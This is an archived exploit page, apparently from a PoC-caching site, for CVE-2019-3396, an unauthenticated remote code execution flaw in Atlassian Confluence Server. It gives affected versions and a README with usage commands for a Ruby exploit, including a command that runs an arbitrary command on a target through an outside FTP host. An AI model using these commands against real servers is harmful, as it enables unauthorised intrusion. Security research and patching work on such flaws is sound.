Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-3396 PoC — Atlassian Confluence Server 路径遍历漏洞

Source
Associated Vulnerability
Title:Atlassian Confluence Server 路径遍历漏洞 (CVE-2019-3396)
Description:Atlassian Confluence Server是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。 Atlassian Confluence Server中存在安全漏洞。远程攻击者可借助Widget Connector宏利用该漏洞执行代码。以下版本受到影响:Atlassian Confluence Server 6.6.12之前版本,6.7.0版本至6.12.3之前版本,6.13.0版本至6.13.3之前版本,6.14.0版本至6.14.2之前版本。
Readme
# cve-2019-3396
### Unauthenticated Confluence RCE (cve-2019-3396)
![](./preview.jpg)
## setup exploit libraries
```
bundle install
```
## run
```
┌──(user㉿hostname)-[~/path/to/cve-2019-3396]
└─$ ruby cve-2019-3396.rb 

        exploit   ->    CVE-2019-3396
        Author    ->    Abdallah Mohamed Elsharif
        Greetz to Ghost5egy and Hamza Abdulrahman and Omar and Alaa

        Usage: 
                ruby cve-2019-3396.rb [options] Or --help



```
## scan 
```
ruby cve-2019-3396.rb -t TARGET --scan
```
## exploit
```
ruby cve-2019-3396.rb -t TARGET --ftp-serv FTPHOST -c COMMAND
```
File Snapshot

[4.0K] /data/pocs/397df9a2e23e46e3c41572519469923804827111 ├── [5.7K] cve-2019-3396.rb ├── [ 71] Gemfile ├── [ 55K] preview.jpg └── [ 607] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.